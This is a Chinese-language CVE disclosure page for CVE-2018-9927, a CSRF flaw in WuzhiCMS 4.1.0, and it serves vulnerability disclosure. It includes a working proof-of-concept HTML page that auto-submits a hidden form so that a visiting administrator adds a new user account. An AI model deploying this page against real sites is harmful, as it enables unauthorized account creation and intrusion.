CVE中文申请站

一、漏洞摘要

漏洞名称: 五指CMS 4.1.0存在CSRF漏洞可增加用户账户
上报日期: 2018-04-10
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/wuzhicms/wuzhicms
软件链接: https://github.com/wuzhicms/wuzhicms
版本: 4.1.0
CVE编号: CVE-2018-9927


二、漏洞概述

五指CMS 4.1.0版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可增加普通用户账户。五指CMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />"; 
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />"; 
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />"; 
fields += "<input type='hidden' name='info[mobile]' value='' />"; 
fields += "<input type='hidden' name='modelids[]' value='10' />"; 
fields += "<input type='hidden' name='info[groupid]' value='3' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='avatar' value='' />"; 
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='info[birthday]' value='' />"; 
fields += "<input type='hidden' name='info[truename]' value='' />"; 
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";

var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=提交";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/7/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9927
exploit-db:https://www.exploit-db.com/exploits/44440/

标签: none